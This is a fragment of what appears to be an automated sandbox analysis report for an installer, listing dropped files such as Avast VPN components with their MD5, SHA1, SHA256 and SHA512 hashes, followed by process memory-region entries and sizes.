                                                                                                                                                e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-LPLU4.tmp\369f0cf17ebf1d3ec9c40d08a760910eeb18687dca3e96c71dee12b877b90316.tmp
                                                                                                                                                MD5

                                                                                                                                                78de2cc886a53e4445ad82a3c80c3e9d

                                                                                                                                                SHA1

                                                                                                                                                57222f63b9b76d1412a81093e8bf1884482c887c

                                                                                                                                                SHA256

                                                                                                                                                92ecc5eca7d2f1e0ce3edeffdafa4d32ab4179de9ce214ae6e83500b4ddb46a7

                                                                                                                                                SHA512

                                                                                                                                                1a3a5d7f47fb477a1d1360a3822785892bd58312569074c51f26221b3b51c931336f2b3f5fc5ec87035405ae9f0ff2f344233d85763f18ac269ddc4ab226d8e5

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-PMBFM.tmp\avastvpn.tmp
                                                                                                                                                MD5

                                                                                                                                                78de2cc886a53e4445ad82a3c80c3e9d

                                                                                                                                                SHA1

                                                                                                                                                57222f63b9b76d1412a81093e8bf1884482c887c

                                                                                                                                                SHA256

                                                                                                                                                92ecc5eca7d2f1e0ce3edeffdafa4d32ab4179de9ce214ae6e83500b4ddb46a7

                                                                                                                                                SHA512

                                                                                                                                                1a3a5d7f47fb477a1d1360a3822785892bd58312569074c51f26221b3b51c931336f2b3f5fc5ec87035405ae9f0ff2f344233d85763f18ac269ddc4ab226d8e5

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-SN942.tmp\_isetup\_iscrypt.dll
                                                                                                                                                MD5

                                                                                                                                                a69559718ab506675e907fe49deb71e9

                                                                                                                                                SHA1

                                                                                                                                                bc8f404ffdb1960b50c12ff9413c893b56f2e36f

                                                                                                                                                SHA256

                                                                                                                                                2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

                                                                                                                                                SHA512

                                                                                                                                                e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

                                                                                                                                              • C:\Windows\Temp\asw-563a661f-3e3f-44b0-a2d7-39e6d2b7f974\avast-vpn\icarus.exe
                                                                                                                                                MD5

                                                                                                                                                07d6eba21be98b66b0a4e4052242320b

                                                                                                                                                SHA1

                                                                                                                                                b600c77a2399905e07caec01323088567bb89857

                                                                                                                                                SHA256

                                                                                                                                                38f144a2f946830dae836a91529e6e009928078ba42db93c125e64458fc552d8

                                                                                                                                                SHA512

                                                                                                                                                89c967830ae75f43f22dd62c24aeef053d8be444b89d5fdbc7767e201027afca77fdb92df13e12b59f3a73fbb61028ffeef2554bc0fb289fa16fd31f41b534b1

                                                                                                                                              • C:\Windows\Temp\asw-563a661f-3e3f-44b0-a2d7-39e6d2b7f974\avast-vpn\icarus_product.dll
                                                                                                                                                MD5

                                                                                                                                                9129251b0954b579ff6c6d2fc14d61c7

                                                                                                                                                SHA1

                                                                                                                                                0d18d71f2c73fe152158e84e125c76d618a33ba0

                                                                                                                                                SHA256

                                                                                                                                                19d6a32d6ed75d82c0d62823f107add86901e13b8302f13f9e5053c991cfc16c

                                                                                                                                                SHA512

                                                                                                                                                b7190ab3d5feed3b7a6d202846ee5b09e6dd22c5539f74c6c22f5350725d2bb7682ea51ebfd6ec4279f8f79e106ef3455d2b07bad26f96d30f5fc3a215900b16

                                                                                                                                              • C:\Windows\Temp\asw-563a661f-3e3f-44b0-a2d7-39e6d2b7f974\avast-vpn\icarus_product.dll
                                                                                                                                                MD5

                                                                                                                                                9129251b0954b579ff6c6d2fc14d61c7

                                                                                                                                                SHA1

                                                                                                                                                0d18d71f2c73fe152158e84e125c76d618a33ba0

                                                                                                                                                SHA256

                                                                                                                                                19d6a32d6ed75d82c0d62823f107add86901e13b8302f13f9e5053c991cfc16c

                                                                                                                                                SHA512

                                                                                                                                                b7190ab3d5feed3b7a6d202846ee5b09e6dd22c5539f74c6c22f5350725d2bb7682ea51ebfd6ec4279f8f79e106ef3455d2b07bad26f96d30f5fc3a215900b16

                                                                                                                                              • C:\Windows\Temp\asw-563a661f-3e3f-44b0-a2d7-39e6d2b7f974\common\bug_report.exe
                                                                                                                                                MD5

                                                                                                                                                efb7a380f9f652ec84e2a8265da5e817

                                                                                                                                                SHA1

                                                                                                                                                8d7deeb92f5a062dc609a529947422adcbe68223

                                                                                                                                                SHA256

                                                                                                                                                8427ac23e6c8997062c2899d20d5d2ce0aa9aaca4f379cf31826bfe282690ae1

                                                                                                                                                SHA512

                                                                                                                                                c0c51aeabedcf1c291907752ea197dbf2cec77009e11bc87e0256e7ddb10815038a04bb90d3a07800c8187c10c17b958288998a78c1eb7e9548ca0e02c53629b

                                                                                                                                              • C:\Windows\Temp\asw-563a661f-3e3f-44b0-a2d7-39e6d2b7f974\common\dump_process.exe
                                                                                                                                                MD5

                                                                                                                                                a4d76a48a9ea34408a7249915275d36d

                                                                                                                                                SHA1

                                                                                                                                                8190c7313d43c88814398fe080c72c1bf320820d

                                                                                                                                                SHA256

                                                                                                                                                eb207013ce1b2d379ffd5bbdda8d660231331b9dbe8db46e682baa39923658ae

                                                                                                                                                SHA512

                                                                                                                                                1deaa05857ffcfed2072d1d68e662d2030de542400fd8ead0a7b71a990d9a811a98a08aa59560a49dc9de59ce286840a23782aad6f17044d52093f2713ac00d7

                                                                                                                                              • C:\Windows\Temp\asw-563a661f-3e3f-44b0-a2d7-39e6d2b7f974\common\icarus.exe
                                                                                                                                                MD5

                                                                                                                                                07d6eba21be98b66b0a4e4052242320b

                                                                                                                                                SHA1

                                                                                                                                                b600c77a2399905e07caec01323088567bb89857

                                                                                                                                                SHA256

                                                                                                                                                38f144a2f946830dae836a91529e6e009928078ba42db93c125e64458fc552d8

                                                                                                                                                SHA512

                                                                                                                                                89c967830ae75f43f22dd62c24aeef053d8be444b89d5fdbc7767e201027afca77fdb92df13e12b59f3a73fbb61028ffeef2554bc0fb289fa16fd31f41b534b1

                                                                                                                                              • C:\Windows\Temp\asw-563a661f-3e3f-44b0-a2d7-39e6d2b7f974\common\icarus.exe
                                                                                                                                                MD5

                                                                                                                                                07d6eba21be98b66b0a4e4052242320b

                                                                                                                                                SHA1

                                                                                                                                                b600c77a2399905e07caec01323088567bb89857

                                                                                                                                                SHA256

                                                                                                                                                38f144a2f946830dae836a91529e6e009928078ba42db93c125e64458fc552d8

                                                                                                                                                SHA512

                                                                                                                                                89c967830ae75f43f22dd62c24aeef053d8be444b89d5fdbc7767e201027afca77fdb92df13e12b59f3a73fbb61028ffeef2554bc0fb289fa16fd31f41b534b1

                                                                                                                                              • C:\Windows\Temp\asw-563a661f-3e3f-44b0-a2d7-39e6d2b7f974\common\icarus_product.dll
                                                                                                                                                MD5

                                                                                                                                                9129251b0954b579ff6c6d2fc14d61c7

                                                                                                                                                SHA1

                                                                                                                                                0d18d71f2c73fe152158e84e125c76d618a33ba0

                                                                                                                                                SHA256

                                                                                                                                                19d6a32d6ed75d82c0d62823f107add86901e13b8302f13f9e5053c991cfc16c

                                                                                                                                                SHA512

                                                                                                                                                b7190ab3d5feed3b7a6d202846ee5b09e6dd22c5539f74c6c22f5350725d2bb7682ea51ebfd6ec4279f8f79e106ef3455d2b07bad26f96d30f5fc3a215900b16

                                                                                                                                              • C:\Windows\Temp\asw-563a661f-3e3f-44b0-a2d7-39e6d2b7f974\common\icarus_rvrt.exe
                                                                                                                                                MD5

                                                                                                                                                fea69f5b59ed161aa62fa9e2ccb9c717

                                                                                                                                                SHA1

                                                                                                                                                a91874fd88d16413287b25f6b4e0dab7fcaf8c1c

                                                                                                                                                SHA256

                                                                                                                                                8db87c4e95b3b7ea4fb841b15b1cd5109f870a98bd883b59d9c8e6698c37b7de

                                                                                                                                                SHA512

                                                                                                                                                1b613636ef118bb89673748f766827d0cf27fb58588772bbeeb5b78e525436fa7a4d2b8fa5bb6d18febbdd8adba0b6cc9e9a2faecfb0cea14cdc1c93ad5c69a1

                                                                                                                                              • C:\Windows\Temp\asw-563a661f-3e3f-44b0-a2d7-39e6d2b7f974\common\icarus_ui.exe
                                                                                                                                                MD5

                                                                                                                                                c354a3a2fb51f852b4492172d3552ec3

                                                                                                                                                SHA1

                                                                                                                                                b4fa7eeffa9db1c648fa633899d542ea204cebd9

                                                                                                                                                SHA256

                                                                                                                                                a1547ff4bc27f8754cd38b932cbc0ba4f13ff1b2a9802f2650d8ccd476c024cc

                                                                                                                                                SHA512

                                                                                                                                                3ff0cd20976dafbac20ee3b24b6214c7d00b26e8d622ecd52cbbdf18de5ff7233be517b1810ce58b0c1b810422bc4ac693a02f4ef952b0364b4d9f56d8b59d39

                                                                                                                                              • C:\Windows\Temp\asw-563a661f-3e3f-44b0-a2d7-39e6d2b7f974\common\icarus_ui.exe
                                                                                                                                                MD5

                                                                                                                                                c354a3a2fb51f852b4492172d3552ec3

                                                                                                                                                SHA1

                                                                                                                                                b4fa7eeffa9db1c648fa633899d542ea204cebd9

                                                                                                                                                SHA256

                                                                                                                                                a1547ff4bc27f8754cd38b932cbc0ba4f13ff1b2a9802f2650d8ccd476c024cc

                                                                                                                                                SHA512

                                                                                                                                                3ff0cd20976dafbac20ee3b24b6214c7d00b26e8d622ecd52cbbdf18de5ff7233be517b1810ce58b0c1b810422bc4ac693a02f4ef952b0364b4d9f56d8b59d39

                                                                                                                                              • C:\Windows\Temp\asw-563a661f-3e3f-44b0-a2d7-39e6d2b7f974\common\product-def.xml
                                                                                                                                                MD5

                                                                                                                                                ce8dfffcddd356a28aeb973f249f23b9

                                                                                                                                                SHA1

                                                                                                                                                365b925d54c77abd308d7540a19b1fac39003ffc

                                                                                                                                                SHA256

                                                                                                                                                28738311e0b8679ba7747bb2c501893dbd59cae041bcc8cbb68990eb5a9db3d8

                                                                                                                                                SHA512

                                                                                                                                                521afe4121ba05366887fac53460a8acf980500381e9cac94dc118d099285cabb751afd9285910f8bae91ef65d7c9d00e3260746716be523208f0a4280fdc286

                                                                                                                                              • C:\Windows\Temp\asw-563a661f-3e3f-44b0-a2d7-39e6d2b7f974\common\product-info.xml
                                                                                                                                                MD5

                                                                                                                                                17ab7025213745817e4b1b1ac17fb19c

                                                                                                                                                SHA1

                                                                                                                                                679765960ae9375942b33677ccb2b8aed9bc7303

                                                                                                                                                SHA256

                                                                                                                                                858aa5931cda4f1336176187c3c7788458c9eef88fd819b33a1b4244842e1b3e

                                                                                                                                                SHA512

                                                                                                                                                7a615b50f6902114421098fa3303cfd772176399e382c77623e83765df81ca70d0d5fd2b2fcc221dac8dd4905dbd1a5c6ee99acad119fc9455efa3cd0ee75316

                                                                                                                                              • C:\Windows\Temp\asw-563a661f-3e3f-44b0-a2d7-39e6d2b7f974\common\setupui.cont
                                                                                                                                                MD5

                                                                                                                                                4f441df2eddb9a8367095e639c9fd752

                                                                                                                                                SHA1

                                                                                                                                                99b4cc5e6f88c513e7d85d37d99635f9de7fb460

                                                                                                                                                SHA256

                                                                                                                                                34376223488d7c4efd75f76e81f73a24fd07358187c6281b65b7d4e99f7f779f

                                                                                                                                                SHA512

                                                                                                                                                24677a4128c3b3b816bad727424d3027cb51509dc4ba607ba909d6caae3ccc87b48352f9455456b1712a791d017105f8ced4b12d76f54067cd7ab3622fdf85e8

                                                                                                                                              • C:\Windows\Temp\asw-563a661f-3e3f-44b0-a2d7-39e6d2b7f974\ecoo.edat
                                                                                                                                                MD5

                                                                                                                                                1be370773525ebbdc9f71b3c8da89204

                                                                                                                                                SHA1

                                                                                                                                                85a9e33d02a930734b412657d3214625d48b20bc

                                                                                                                                                SHA256

                                                                                                                                                bc4c21eaf8f6f69a038ba1225ab46a53de33f690c44aa674dd01251a81567461

                                                                                                                                                SHA512

                                                                                                                                                56993804ca3495729e393987712cc09d4ac20fb8987c8104b1ac901a18f72cb50e58779f9abb9e9149385eddbbc154aefdee511754fabe2e56035eecb7902684

                                                                                                                                              • C:\Windows\Temp\asw-563a661f-3e3f-44b0-a2d7-39e6d2b7f974\icarus-info.xml
                                                                                                                                                MD5

                                                                                                                                                1988dbb5a9d1c058a4df73322f86469a

                                                                                                                                                SHA1

                                                                                                                                                ef049be63b7f91bc545b3e1afe6688bb32d2437c

                                                                                                                                                SHA256

                                                                                                                                                5c738be0f966d360a923059e309ee6b1dfb7ea2495dfd8cf506e6b8eab2a09b0

                                                                                                                                                SHA512

                                                                                                                                                883596db10ff43465c95631d7e63d5a29f98367e19aa4255e8e51d1a59541cbb2a0586afea678d58de3ae45ac0540d8229b957afa2b33c69c0ab7b8d9bc4abe5

                                                                                                                                              • memory/216-163-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/404-239-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/404-136-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/544-181-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/648-154-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/696-211-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/872-184-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/956-260-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/956-183-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/1060-188-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/1068-259-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/1168-179-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/1168-257-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/1196-266-0x0000000000160000-0x00000000007A8000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                6.3MB

                                                                                                                                              • memory/1196-267-0x0000000000160000-0x00000000007A8000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                6.3MB

                                                                                                                                              • memory/1196-268-0x0000000074BE0000-0x0000000074C69000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                548KB

                                                                                                                                              • memory/1332-166-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/1384-262-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/1624-151-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/1632-277-0x0000000000400000-0x0000000000493000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                588KB

                                                                                                                                              • memory/1632-278-0x0000000000BC0000-0x0000000000C53000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                588KB

                                                                                                                                              • memory/1632-281-0x0000000000BC0000-0x0000000000C53000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                588KB

                                                                                                                                              • memory/1632-284-0x0000000000BC0000-0x0000000000C53000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                588KB

                                                                                                                                              • memory/1640-204-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/1644-200-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/1720-194-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/2036-130-0x0000000000400000-0x00000000004CC000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                816KB

                                                                                                                                              • memory/2036-132-0x0000000000400000-0x00000000004CC000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                816KB

                                                                                                                                              • memory/2228-168-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/2344-178-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/2392-133-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/2404-244-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/2448-208-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/2520-220-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/2532-229-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/2580-235-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/2848-167-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/3136-170-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/3200-155-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/3216-254-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/3284-165-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/3304-199-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/3344-245-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/3392-145-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/3560-186-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/3572-255-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/3584-143-0x0000000000400000-0x00000000004CC000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                816KB

                                                                                                                                              • memory/3584-140-0x0000000000400000-0x00000000004CC000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                816KB

                                                                                                                                              • memory/3584-138-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/3616-176-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/3652-256-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/3688-174-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/3716-196-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/3804-207-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/3852-161-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/3888-171-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/3952-261-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/3976-180-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/3988-219-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4112-182-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4116-258-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4200-193-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4312-263-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4320-152-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4484-205-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4536-232-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4544-149-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4652-146-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4660-248-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4668-156-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4764-157-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4768-158-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4856-285-0x0000000000400000-0x0000000000493000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                588KB

                                                                                                                                              • memory/4856-286-0x0000000000400000-0x0000000000493000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                588KB

                                                                                                                                              • memory/4856-287-0x0000000000400000-0x0000000000493000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                588KB

                                                                                                                                              • memory/4924-222-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4948-217-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4976-192-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5032-272-0x0000000000BF0000-0x000000000119A000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                5.7MB

                                                                                                                                              • memory/5032-273-0x0000000006170000-0x0000000006714000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                5.6MB

                                                                                                                                              • memory/5032-274-0x00000000036D0000-0x0000000003714000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                272KB

                                                                                                                                              • memory/5032-275-0x00000000037C0000-0x0000000003852000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                584KB

                                                                                                                                              • memory/5032-276-0x0000000074BE0000-0x0000000074C69000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                548KB

                                                                                                                                              • memory/5032-271-0x0000000000BF0000-0x000000000119A000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                5.7MB